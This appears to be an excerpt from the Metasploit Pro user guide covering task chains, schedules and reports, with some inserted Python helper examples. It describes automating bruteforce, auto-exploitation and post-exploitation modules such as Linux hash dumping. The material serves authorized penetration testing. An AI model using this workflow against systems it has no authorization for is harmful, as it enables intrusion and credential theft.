Task chains enable you to automate and schedule the execution of a series of preconfigured tasks. They are useful for automating repetitive tasks that you need to perform regularly, such as scans and bruteforce attacks. A task chain comprises a sequence of predefined tasks that you can schedule to run on a recurring basis or save to run on demand. It defines the tasks that will run, the settings for each task, and the conditions required for the execution of those tasks. You create a task chain by adding the tasks you want to it, configuring the settings you want the tasks to use, arranging the tasks in the order you want them to run, and defining the schedule that it should follow. Task chains are particularly useful if you want to run a sequence of tasks but do not want to wait for each task to finish before you can run the next task. For example, if you routinely scan and bruteforce a set of target hosts, you can string the tasks together so that they run sequentially at a specified time and date.

Task Chain UI Tour


The task chain features are separated into two different areas:
- Task chains list - Displays all the task chains that are stored in the project. From this list, you can bulk manage task chains, view the current status for a task chain, view the contents of the task chain, and identify when a task chain will run next.
- Task chain configuration page - Displays the contents of a task chain. From this page, you can add, configure, and rearrange tasks, and you can create the schedule for the task chain.

Task Chains List


You can access the task chains list to perform the following tasks:
- Create a new task chain
- Delete task chains
- Clone task chains
- Suspend task chains
- Run task chains
- View the current status for a task chain
- View the last time the task chain was run
- View the tasks that comprise a task chain

To access the task chains list, select Tasks > Chains from the Project tab bar.


Task chains list

1. New Task Chain button - Opens the New Task Chain configuration page.
2. Task chain bulk management buttons - Bulk manage task chains. You can do things like delete, clone, suspend, and run multiple task chains at once.
3. Task chains list - Lists all of the task chains that have been created for the project. Each task chain will have one of the following schedule icons:
   - Recurring Schedule - Indicates that the task chain repeatedly runs at a specified time and day.
   - Single Schedule - Indicates that the task chain is scheduled to run once at a specified time and date.
   - Not Scheduled - Indicates that the task chain does not follow a schedule.
   - Suspended - Indicates that the task chain is inactive.
4. Task chain status - Displays one of the following statuses for each task chain:
   - Never run - The task chain has never run.
   - Running - The task chain is currently running.
   - Last run - The task chain last ran successfully at the specified date.
   - Failed - The task chain was unable to finish successfully. If the task chain failed, it will display a link that you can click on to open the Task log and view the errors that occurred.

Task Chain Configuration Page


You access the task chain configuration page to create a new task chain or to modify an existing task chain. To access the task chain configuration page, select Tasks > Chains from the Project tab bar. When the task chains list appears, click the New Task Chain button.


Task configuration page

1. Task Chain Name field - Displays an editable field for the task chain name. You can click on the field at any time to edit its name. 2. Schedule status - Indicates whether or not a schedule has been created for the task chain. It displays one of the following statuses:
l

Scheduled - Indicates that a schedule has been created for the task chain. Unscheduled - Indicates that a schedule has not been created for the task chain.

3. Schedule Now link - Opens the Task ChainScheduler, which enables you to schedule and suspend task chains. Additionally, you can enable the option to clear project data before the task chain runs. 4. Save and Run button - Saves the current task chain configuration and immediately runs the task chain. 5. Save button - Saves the current task chain configuration. The task chain will be available for you to run on demand or it will run according to the schedule that you have created for it. 6. Delete task - Removes the selected task from the task chain. 7. Clone task - Duplicates the selected task and adds it to the end of the task chain. 8. Reset task configuration - Clears all tasks from the task chain. 9. Task bubble - Represents a task. You can click on a task bubble to open the task configuration form. The selected task bubble will be highlighted in blue. Any task highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form. You can also click and drag the task bubble to move the task to a new position in the task chain.


10. Add Task button - Displays the task list and enables you to select the task that you want to add to the task chain.
11. Task configuration form - Displays the options that you can configure for the task that is selected. Options will vary depending on the task that is selected.

Supported Tasks
Task chains can be used to execute the following tasks:
• Discovery scan - Enumerate and fingerprint hosts on a target network.
• Import - Bring in data from supported third-party scanners, such as Nexpose and Nessus.
• Vulnerability scan - Scan a target network with Nexpose to find vulnerabilities on a target network.
• Web scan - Scan web forms and applications to find and exploit active content and forms.
• Bruteforce - Systematically attempt various combinations of letters, numbers, and characters to crack credentials.
• Auto-exploitation - Automatically build an attack plan by cross-referencing open ports, imported vulnerabilities, and fingerprint information to exploit modules.
• Single module run - Launch a module to perform targeted attacks against hosts or to gather additional data about hosts. You can add multiple modules to a task chain.
• MetaModules run - Launch one of the following MetaModules: the Single Password Testing MetaModule, the Known Credentials MetaModule, the SSH Key Testing MetaModule, the Pass the Hash MetaModule, the Firewall Egress Testing MetaModule, or the Passive Network Discovery MetaModule.
• Evidence collection - Collect evidence, such as screenshots, password hashes, and system files, from compromised hosts.
• Session clean up - Close any open sessions on compromised hosts.
• Report generation - Create a report to document findings and share test results.


Working with Task Chains


Task chains enable you to automate and schedule the execution of a series of repetitive tasks that you need to perform regularly, such as scans and bruteforce attacks. A task chain defines the tasks that will run, the settings for each task, and the conditions required for the execution of those tasks. You create a task chain by adding the tasks you want to it, configuring the settings you want the tasks to use, arranging the tasks in the order you want them to run, and defining the schedule that it should follow.

Creating a Task Chain


1. From within a project, select Tasks > Chains from the Project tab bar. The task chains list appears.
2. Click the New Task Chain button. The New Task Chain page appears.
3. Enter a name for the task chain in the Task Chain Name field.
4. Click the '+' button to add a task. The task list appears.


5. Select a task from the list. A new task bubble appears on the task chain and the task configuration page displays below the task chain.
6. Configure the task as you usually would. The steps for configuring a task vary based on task type. For more information on configuring a specific task, see one of the following topics:
   • Running a Discovery Scan on page 135
   • Importing Scan Data on page 150
   • Running a Nexpose Scan on page 205
   • Running a Bruteforce Attack on page 226
   • Running a Module on page 119
   • Running Automated Exploits on page 238

After you configure the task, you can add additional tasks to the task chain. When you finish building the task chain, you can create a schedule for the task chain or you can save the task chain to run on demand.


For more information on scheduling a task chain, see Task Chain Schedules on page 427.

Adding a Task to a Task Chain


To add a task to a task chain, click the '+' Add task button.

When you click the '+' button, the task list appears and shows you the tasks that can be added to the task chain.

After you add the task, a new task bubble appears on the task chain, and the task configuration form displays below the task chain.

The task bubble displays the task's position in the task chain. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth. You can click the task bubble and drag it to reposition it in the task chain. Any task bubble highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form.


Cloning a Task
When you clone a task, you are adding a copy of the task to the end of the task chain. You can move or modify the task as needed.

Note: You should only clone tasks that are highlighted in blue, which indicates that there are no errors in the task configuration.

To clone a task, click the task you want to clone to select it.

Then, click the Clone button located in the task chain tool bar.

The cloned task will be added to the end of the task chain.

If you need to reposition the task in the task chain, click on the task and drag it to the position you want it to appear in the task chain.

Rearranging Tasks in a Task Chain


To move a task to a different position in the task chain, click the task bubble and drag it to reposition it in the task chain.


After you reposition the task, the position that displays in the task bubble is updated. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth.

Adding a Post-Exploitation Module to a Task Chain


Post-exploitation is the phase that occurs after the system successfully exploits the target. It is the process that you use to identify information that helps you gain further access to the target or to additional systems within the target's internal networks.

When you manually run an attack against a target and get an active session, Metasploit Pro provides actions that you can take against the session. The actions are available on the session page and vary based on the session type, such as shell or Meterpreter, and system information. For example, if the system opens a shell on a target, the actions that you can take include opening a command shell that connects to the target and collecting system data. If the system opens a Meterpreter session, you can do things like set up a proxy pivot or access the file system. Using the target system information, Metasploit Pro automatically displays the post-exploitation modules that are applicable to the target. This makes it easy for you to identify and choose the post-exploitation modules that you want to run against the target.

When you work with task chains, the post-exploitation process is completely manual. You must search for the post-exploitation modules that you want to use based on the information that you have about the target. For example, if you know the target is a Windows system and you want to capture screenshots, you may want to add a module task to your task chain that runs post/windows/gather/screenshot. Or if you know your target is a Linux system and you want to collect hashes, you may want to run post/linux/gather/hashdump.

Removing a Task from a Task Chain


To remove a task from a task chain, click the task you want to delete to select it.


Then, click the Delete button located in the task chain toolbar.

A dialog window will appear and prompt you to confirm that you want to delete the task. Click OK to delete the task from the task chain. You can only remove one task at a time. If you need to remove multiple tasks, repeat the steps listed above or reset the task chain. For more information on resetting the task chain, see Resetting a Task Chain on page 418.


Note: After you remove a task from the task chain, you will not be able to recover the task. You will need to rebuild the task.

Clearing the Project Data before a Task Chain Runs


If you want to clear the project data before the task chain runs, you can enable the Delete previous project data option.


Any and all data stored in the project, including hosts, collected evidence, session information, reports, and credentials will be wiped from the project. Enable this option only if you want to start the task chain with an empty project. Data cannot be recovered after it has been cleared from the project.

Resetting a Task Chain


You can reset a task chain to clear all of the tasks from it. A task chain reset will remove all tasks and their configurations from the task chain. This action cannot be reverted. To reset a task chain, click the Reset button located in the task chain toolbar.

A dialog window will appear and prompt you to confirm that you want to reset the task chain. Click OK to reset it.

Running a Task Chain


You can run a task chain on demand, outside the scope of its schedule. To run a task chain, select Tasks > Chains from the Project tab bar. Select the task chain that you want to run.

Click the Run Now button.


A dialog window will appear and prompt you to confirm that you want to run the task chain. Click OK to run it.


Managing and Editing Task Chains


Task chains are a series of preconfigured tasks that execute in sequential order. They are editable, cloneable, and suspendable, which makes it easy for you to manage and reuse task chains. For example, if you have an existing task chain that you want to reuse with a slightly different configuration, you can clone and customize that task chain.

Editing a Task Chain


You can edit a task chain to modify its existing settings. To edit a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, click on the name of the task chain that you want to edit.

When the task chain configuration page opens, you can do things like add, clone, and remove tasks; tweak settings for a particular task; and update the schedule for the task chain.


Cloning a Task Chain


When you clone a task chain, you are making a copy of it. Cloning enables you to reuse an existing task chain configuration. For example, you may want to clone a task chain if you want to run the same task chain on a different schedule or if you want to run a task chain with slight modifications. To clone a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, select the task chain that you want to clone.

Click the Clone button.

The task chain configuration form appears. The form retains the configuration settings that you used to create the original task chain. You can run the task chain as is, or you can modify its settings. The cloned task chain will use the following naming convention: [task-chain-name]-timestamp.

Suspending a Task Chain


You can suspend a task chain if you want the task chain to ignore its current schedule. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself.

Note: When you suspend a running task chain, the task chain will be canceled. Do not suspend a running task chain unless you intend to stop it.

To suspend a task chain, select Tasks > Chains from the Project tab bar.


When the Task Chains list appears, select the task chain whose schedule you want to suspend. The task chain that you select must be scheduled and in an unsuspended state. These task chains will have a scheduled icon located next to them.

Note: If you need to bulk suspend task chains, you can select multiple task chains.

Click the Suspend button.

The schedule icon changes to the suspended icon.


To unsuspend a task chain, select it and click the Unsuspend button. The task chain you selected must be in a suspended state.

Updating the Schedule for a Task Chain


To edit the schedule for an existing task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, click on the name of the task chain whose schedule you want to edit.

When the task chain configuration page opens, click on the Schedule Now link to open the scheduler.

The scheduler will display the current schedule. You can use the scheduler to update the existing settings.

Stopping a Running Task Chain


To cancel a running task chain, select Tasks > Chains from the Project tab bar. Select the running task chain you want to cancel and click the Stop button. A running task chain will show a running icon in the Status column.


Any data that was collected before you stopped the tasks will still be stored in the project.

Stopping All Running Tasks


To stop all tasks that are currently running in Metasploit Pro, select Administration > Global Settings. Scroll down to the bottom of the page and find the Stop all tasks button. This will immediately stop all active tasks. Please alert your other team members if you intend to cancel their running tasks.

Any data that was collected before you stopped the tasks will still be stored in the project.

Viewing the Tasks Log


The Tasks Log shows you the events for a particular task. To view the task log for a task, select Tasks > Show Tasks from the Project tab bar. When the task log appears, find and click on the task you want to view.

The Tasks Log appears and shows you the status and activity for the task.


Cleaning Up Open Sessions


A task chain that includes a task like bruteforce, exploit, or module run may open a session on the target system. An open session enables you to interact with the compromised system. When you are done with a session, you should close the connection with the target. To clean up and close open sessions, you should add a clean up task to the task chain. As a rule of thumb, the clean up task should be the last task in the task chain. This ensures that Metasploit Pro has the opportunity to collect system information and take advantage of open sessions before it closes them.

Deleting a Task Chain


When you delete a task chain, it will be permanently removed from the project, and you will no longer be able to access or run it. You will not be able to recover a deleted task chain. To delete a task chain, select Tasks > Chains from the Project tab bar. When the Task Chains list appears, select the task chain that you want to delete.

Click the Delete button.


Task Chain Schedules


A schedule defines how often and when a task chain runs. You can choose to run the task chain hourly, at a specific time on certain week days, monthly at a set frequency, or you can save the task chain to run as you need. For example, let's say you want to run the task chain every day at 12 a.m. You will need to configure the task chain to run daily at midnight starting on a specific date. You can also set optional conditions, such as the maximum run time for the task chain and the expiration date for the schedule. The following image shows the Task Chain Scheduler and the configuration for the previous example:

Schedule Options
There are a few different schedule options that you can use to control when a task chain runs. The following schedule options are available:
• Once - Runs the task chain once on a specific date. For example, you may want to choose this option if you want to run the task chain once at midnight on December 15, 2014.
• Hourly - Runs the task chain every hour. For example, you may want to choose this option if you want to run the task chain at half past every hour.
• Daily - Runs the task chain every day. For example, you may want to choose this option if you want to run the task chain every day at midnight.
• Weekly - Runs the task chain on certain days of the week. For example, you may want to choose this option if you want to run the task chain every Monday and Wednesday at midnight.
• Monthly - Runs the task chain on a specific day of the month. For example, you may want to choose this option if you want to run the task chain on the last day of each month.


Scheduling a TaskChain
1. From within the project that contains the task chain you want to schedule, select Tasks > Chains from the Project tab bar.
2. Find and open the task chain you want to schedule. The configuration form for the task chain opens.
3. Click the Schedule Now link. The scheduler appears.
4. Click the Run Chain dropdown to display the recurrence options. You can choose once, hourly, daily, weekly, or monthly. The options that appear depend on the recurrence option you have selected. For example, if you want to run the task chain daily, you will need to specify if the task chain should run every day, every 2 days, every 3 days, and so on. You must also indicate the date and time you want the task chain to start.
5. (Optional) Click the Max Duration dropdown and choose a time limit for the task chain.
6. Click the Done button to save the schedule. The scheduler closes and the task chain configuration page appears.
7. Save the task chain. The task chain will run according to the date and time you have scheduled.

Suspending a Schedule
You can indefinitely suspend a schedule from the Scheduler or from the Task Chains List. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself. To suspend the schedule, select the Suspend option located on the Scheduler.


To unsuspend the schedule, deselect the Suspend option located on the Scheduler.

Setting the Maximum Duration for a Task Chain


The maximum duration is the time limit that you want to enforce on a task chain. You set a maximum duration if you do not want a task chain to exceed a certain time frame. Once the task chain reaches the maximum duration, it will be stopped in its current state. All data that has been collected until that point will be saved in the project. To set a time limit on the task chain, use the Max Duration option located on the scheduler.


If you do not want to set a time limit on the task chain, you can set the maximum duration to Never Expire.
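To make the recurrence, start time, Max Duration and suspend choices described above concrete, here is an added example that resolves a schedule into its next run times and the hard-stop time of each run. It is not code from this guide or from Metasploit Pro: the way the scheduler's choices are modelled as fields (an interval for hourly and daily, a weekday set for weekly, a day of month for monthly, a duration in hours, a suspend flag) is an assumption. It also flags a schedule whose Max Duration is longer than the gap to the next run, a case worth checking before a long scan is scheduled to repeat.

```python
"""Resolve a task chain schedule into concrete run times (added example, not Metasploit Pro code)."""
import calendar
import itertools
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Iterator, List, Optional, Set


@dataclass
class Schedule:
    # Assumed model of the scheduler form; field names are this example's, not the product's.
    recurrence: str                      # "once" | "hourly" | "daily" | "weekly" | "monthly"
    start: datetime                      # date and time of the first possible run
    interval: int = 1                    # every N hours (hourly) or every N days (daily)
    weekdays: Set[int] = field(default_factory=set)   # weekly: 0 = Monday ... 6 = Sunday
    day_of_month: Optional[int] = None   # monthly: 1..31, or None for "last day of the month"
    max_hours: Optional[float] = None    # Max Duration; None models the Never Expire choice
    suspended: bool = False              # a suspended schedule never fires


def parse_start(text: str) -> datetime:
    """Parse 'YYYY-MM-DD HH:MM' as typed into the start date and time fields."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M")


def fmt(t: datetime) -> str:
    return t.strftime("%Y-%m-%d %H:%M")


def _stepped(sched: Schedule, step: timedelta) -> Iterator[datetime]:
    """Hourly and daily recurrences: start, start + step, start + 2*step, ..."""
    t = sched.start
    while True:
        yield t
        t += step


def _weekly(sched: Schedule) -> Iterator[datetime]:
    """Walk forward a day at a time, keeping the selected weekdays at the start's time of day."""
    days = sched.weekdays or {sched.start.weekday()}
    t = sched.start
    while True:
        if t.weekday() in days:
            yield t
        t += timedelta(days=1)


def _monthly(sched: Schedule) -> Iterator[datetime]:
    """One run per month; a day beyond the month's length is clamped to its last day."""
    year, month = sched.start.year, sched.start.month
    while True:
        last = calendar.monthrange(year, month)[1]
        day = last if sched.day_of_month is None else min(sched.day_of_month, last)
        t = sched.start.replace(year=year, month=month, day=day)
        if t >= sched.start:          # skip a day-of-month that already passed in the start month
            yield t
        year, month = (year + 1, 1) if month == 12 else (year, month + 1)


def next_runs(sched: Schedule, count: int) -> List[datetime]:
    """Return the next `count` run times for the schedule (empty while suspended)."""
    if sched.suspended or count <= 0:
        return []
    generators = {
        "once": lambda s: iter([s.start]),
        "hourly": lambda s: _stepped(s, timedelta(hours=s.interval)),
        "daily": lambda s: _stepped(s, timedelta(days=s.interval)),
        "weekly": _weekly,
        "monthly": _monthly,
    }
    return list(itertools.islice(generators[sched.recurrence](sched), count))


def hard_stop(sched: Schedule, run_at: datetime) -> Optional[datetime]:
    """When a run that begins at `run_at` is cut off by Max Duration (None: never)."""
    return None if sched.max_hours is None else run_at + timedelta(hours=sched.max_hours)


def runs_can_overlap(sched: Schedule) -> bool:
    """True when a run that uses its full Max Duration would still be active at the next start."""
    runs = next_runs(sched, 2)
    if len(runs) < 2:
        return False
    stop = hard_stop(sched, runs[0])
    return stop is not None and stop > runs[1]


if __name__ == "__main__":
    # Constructed example: the guide's "every day at midnight", started on 21 March 2014.
    nightly = Schedule("daily", parse_start("2014-03-21 00:00"), max_hours=6)
    for run in next_runs(nightly, 3):
        print(fmt(run), "-> hard stop at", fmt(hard_stop(nightly, run)))
    print("overlap risk:", runs_can_overlap(nightly))
```

The clamping in the monthly branch is what makes "the last day of each month" and "the 31st" behave sensibly in February; the overlap check is the caveat to run whenever Max Duration is set on a chain that repeats often.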


Chapter 19: Reports

A report takes a snapshot of the data in a project at a particular moment in time and compiles the results into a tangible output format. You create a report to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so that they can quickly prioritize, reproduce, and remediate their vulnerabilities. Most of the time, you will generate a report to create a distributable document that presents both high-level statistics and detailed critical findings. Whether someone wants an at a glance summary or needs the technical details of your penetration test, the report will be able to cater to both ends of the viewer spectrum. To work with reports, you will need to use the Metasploit Pro web interface, which provides you with robust and comprehensive reporting capabilities. To learn more about reports, read the following topics:
• About Reports on page 433
• Metasploit Report Types on page 1
• Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports on page 1
• Customizing Standard Reports on page 454
• Working with Custom Templates on page 461

About Reports
A report takes a snapshot of the data in a project at a particular moment in time. It enables you to compile data from a project so that you can present it in a tangible output format. You create reports to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so they can prioritize, reproduce, and remediate their vulnerabilities. By understanding the results of a penetration test, an organization can learn how they can mitigate weaknesses in their security infrastructure.

Report Output Formats


Metasploit Pro enables you to generate a report in the following output formats:
• PDF - A document that can be opened and viewed with Adobe Reader. This is the default type.
• HTML - A file that can be opened and viewed in a Web browser.
• RTF - A document that uses text-based encoding, which enables its content to be viewed in most major word processing applications. You can use this format if you want to edit or annotate the report or if you need to distribute the report across multiple platforms.
• Word - A document that can be opened, viewed, and edited in Microsoft Word. You can use this format if you want to edit or annotate the report.

You can generate any combination of output formats for each report. Each instance will be an artifact of the report.

What Are Report Artifacts?

An artifact refers to the output formats that have been generated for a report. For example, a PDF and RTF version of the same Social Engineering Report are artifacts of the report. To view the artifacts for a report, select Reports > Show reports from the Project tab bar. The Reports List shows all the reports that have been generated for the project and displays the artifacts for each report in the File Formats column.


Reports Directory
When Metasploit Pro generates a report, it stores a copy of the file in /path/to/Metasploit/apps/pro/reports/artifacts. The files that are stored in this directory will match the list of reports displayed in the web interface. You can go to the reports directory to download or view reports; however, you should not make any changes directly to the default reports directory. If you need to modify the reports, you should make a copy of the reports directory and make your changes from the new directory. Any changes that you make directly to the reports can cause disparities between the metadata that displays for the file in the web interface and the file itself. If you need to remove reports from a project, you should do it from within the web interface. Do not delete them directly from the reports directory.
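The check implied above, comparing what the Reports List says should exist with what is actually in the artifacts directory so that hand edits or deletions show up as a mismatch, can be scripted. The following is an added example and not Metasploit Pro code: the artifacts path is the one the guide names, the report names and formats are constructed as a reader would transcribe them from the Reports List and its File Formats column, and the file naming scheme <report name>.<extension> is an assumption.

```python
"""Reconcile the report artifacts directory against the Reports List (added example, not Metasploit Pro code)."""
import os
import tempfile
from typing import Dict, Iterable, List

# Directory named in the guide; "/path/to" is the installation-specific prefix.
DEFAULT_ARTIFACTS_DIR = "/path/to/Metasploit/apps/pro/reports/artifacts"

# Assumed file extension for each output format shown in the File Formats column.
EXTENSIONS = {"PDF": "pdf", "HTML": "html", "RTF": "rtf", "Word": "docx"}


def expected_files(reports: Dict[str, Iterable[str]]) -> List[str]:
    """Map {report name: [formats]} from the Reports List to the file names that should be on disk."""
    return sorted(f"{name}.{EXTENSIONS[fmt]}" for name, formats in reports.items() for fmt in formats)


def reconcile(artifacts_dir: str, reports: Dict[str, Iterable[str]]) -> Dict[str, List[str]]:
    """Report files the UI lists but the directory lacks, and files on disk the UI does not know about."""
    expected = set(expected_files(reports))
    on_disk = {entry.name for entry in os.scandir(artifacts_dir) if entry.is_file()}
    return {
        "missing_on_disk": sorted(expected - on_disk),   # deleted or renamed outside the web interface
        "unknown_to_ui": sorted(on_disk - expected),     # added or edited outside the web interface
    }


def demo() -> Dict[str, List[str]]:
    # Constructed: what the Reports List shows for the project.
    ui_reports = {"Audit-2014-03-21": ["PDF", "RTF"], "Services-2014-03-21": ["HTML"]}
    with tempfile.TemporaryDirectory() as artifacts_dir:
        # Constructed directory state: one artifact removed by hand, one annotated copy dropped in.
        for name in ["Audit-2014-03-21.pdf", "Services-2014-03-21.html", "Audit-2014-03-21-notes.rtf"]:
            open(os.path.join(artifacts_dir, name), "w").close()
        return reconcile(artifacts_dir, ui_reports)


if __name__ == "__main__":
    print(demo())
```

Against a live installation you would call reconcile(DEFAULT_ARTIFACTS_DIR, ...) with the report list transcribed from the web interface; any entry under either key is a file that should be fixed through the web interface rather than in the directory.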

Viewing Reports Generated with Metasploit Pro 4.8 and Earlier


All reports generated with Metasploit Pro 4.8 and earlier are stored in the /path/to/Metasploit/apps/pro/reports/legacy_reports directory. These reports are not accessible from the web interface.

Report Logs
The report log maintains a historical record of all report-related events. Metasploit Pro automatically updates the report log each time you generate a report. If you experience any issues with a report, you can view the report log to find stack trace errors and troubleshoot them.

Viewing the Report Log


You can find and view the report log in the following directory: /path/to/Metasploit/apps/pro/ui/log. The report log is named reports.log.

Clearing the Report Log


To clear the report log, you will need to remove it from the log directory, which is located at /path/to/Metasploit/apps/pro/ui/log. Metasploit Pro will generate a new report log if it detects that one does not exist.

Note: Before you delete the report log, you should make a copy of it in case you need it for reference later.


Using the Reporting Interface


The Reports page is divided into four different areas, which enables you to perform the following tasks:
• View reports
• Generate standard reports
• Generate custom reports

Generating a Standard Report


The Standard Report Form enables you to specify the options you want to use to create your report, such as the report type and output format.

1. Report Type - Choose from one of the following report types: Activity, Audit, Authentication Tokens, Collected Evidence, Compromised and Vulnerable Hosts, FISMA Compliance, PCI Compliance, Services, Social Engineering, and Web Application Assessment.


2. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word.
3. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report.
4. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report.
5. Cover Logo - Specify the logo that you want to add to the cover page of the report.
6. Sections - Choose the sections you want to include in the report. By default, all report sections are selected. The report sections that are available vary between report types. The form automatically displays the sections that are supported for the report type that is currently selected.
7. Options - Use these options to manage confidential data and graphics in a report. The report form displays the options that are applicable for the report type selected. The following options may be available for each report:
   • Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from a report. The report displays the user name and a blank password.
   • Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
   • Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report.
   • Include web page HTML (in addition to image preview) - Includes a preview of the web pages used in the social engineering campaign. (Social Engineering Campaign Details Report only)
8. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.

Generating a Custom Report


The Custom Report Form enables you to specify the options you want to use to customize your report.


1. Custom Report Collateral - Upload Jasper templates and logos that can be used for customizing reports. Supported collateral types include Jasper report templates and image files, such as JPEG, PNG, and GIF.
2. Custom Report Template - Select the template that you want to use to create your report.
3. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word.
4. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report.
5. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report.
6. Cover Logo - Specify the logo that you want to apply to the report.
7. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
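The Included addresses and Excluded addresses fields appear on both the standard and the custom report form. The following added example, which is not Metasploit Pro code, shows how a white list and a black list combine to decide which project hosts a report covers. It assumes the fields accept the same target notation as the product's scan forms (single IPv4 addresses, CIDR blocks, and dash ranges such as 10.0.0.1-10.0.0.20 or the shorthand 10.0.0.1-20, separated by whitespace or commas), that an empty white list means every host in the project, and that an address listed in both fields is excluded; the sample host list is constructed.

```python
"""Resolve the report form's Included/Excluded addresses into the hosts a report covers (added example, not Metasploit Pro code)."""
import ipaddress
import re
from typing import Iterable, List, Set

Address = ipaddress.IPv4Address


def parse_address_list(text: str) -> Set[Address]:
    """Expand one address field into the set of addresses it names (notation assumed, see lead-in)."""
    addresses: Set[Address] = set()
    for token in re.split(r"[\s,]+", text.strip()):
        if not token:
            continue
        if "/" in token:
            # CIDR block: every address in the block, network and broadcast included
            addresses.update(ipaddress.IPv4Network(token, strict=False))
        elif "-" in token:
            low_text, high_text = token.split("-", 1)
            if "." not in high_text:
                # Shorthand range: only the last octet of the upper bound is given
                high_text = ".".join(low_text.split(".")[:3] + [high_text])
            low, high = Address(low_text), Address(high_text)
            if high < low:
                raise ValueError(f"range {token} runs backwards")
            addresses.update(Address(n) for n in range(int(low), int(high) + 1))
        else:
            addresses.add(Address(token))
    return addresses


def hosts_in_report(project_hosts: Iterable[str], included: str = "", excluded: str = "") -> List[str]:
    """Apply the white list, then the black list; an empty white list admits every project host."""
    white = parse_address_list(included)
    black = parse_address_list(excluded)
    selected: List[str] = []
    for host in project_hosts:
        address = Address(host)
        if white and address not in white:
            continue          # not on the white list
        if address in black:
            continue          # black list always wins
        selected.append(host)
    return selected


# Constructed sample of hosts as they might appear in a project's Hosts list.
SAMPLE_HOSTS = ["10.0.0.5", "10.0.0.20", "10.0.0.21", "10.0.1.7", "192.168.1.10"]

if __name__ == "__main__":
    print(hosts_in_report(SAMPLE_HOSTS, included="10.0.0.0/24, 192.168.1.10", excluded="10.0.0.20-21"))
```

Running the check before generating a report that will leave the team is a cheap way to confirm that out-of-scope or third-party hosts really are excluded from the output.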


Metasploit Report Types


Since projects can contain a multitude of information, Metasploit Pro offers several different report types to help you control the scope of data that you present to an organization. Each report focuses on a particular set of data that is stored within a project. For example, you can create a report that contains social engineering data or vulnerability validation results.

Understanding Report Types


The following sections provide an overview of each report type, the options that are available for it, and the sections that it includes.

Activity Report

Description: Generates a human readable version of the activity log.
Output formats: PDF, HTML, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Cover, Project Summary, and Task Details

Audit Report
Description: Provides a comprehensive and detailed report of the project findings.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Executive Summary and Tags, Compromised Hosts, Compromised Credentials, Discovered OSes, Discovered Hosts, Host Details, Discovered Services, and Web Sites
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Authentication Tokens Report


Description: Reports all cracked hosts, passwords, SMB hashes, and SSH keys that were collected and discovered.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Authentication Token Summary, Guessed Password Summary, and Authentication Token Details
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Collected Evidence Report


Description: Reports on all looted hosts. Describes the files and screenshots that were collected from compromised hosts.
Output formats: PDF, HTML, WORD, RTF
Report options:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from the report. The Audit report will display the user name with a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in the report.
Report sections: Project Summary, Executive Summary, Evidence Summary Table, Complete Evidence Table, Collected Screenshots, and Collected Text Files
Report directory: /path/to/metasploit/pro/reports/audit/
Report template: /path/to/metasploit/pro/reports/audit/msfxv3.jrxml

Compromised and Vulnerable Hosts Report

Description: Reports on all hosts on which Metasploit was able to open a session, hosts on which a Metasploit module was successfully run, and hosts where a vulnerability was recorded.
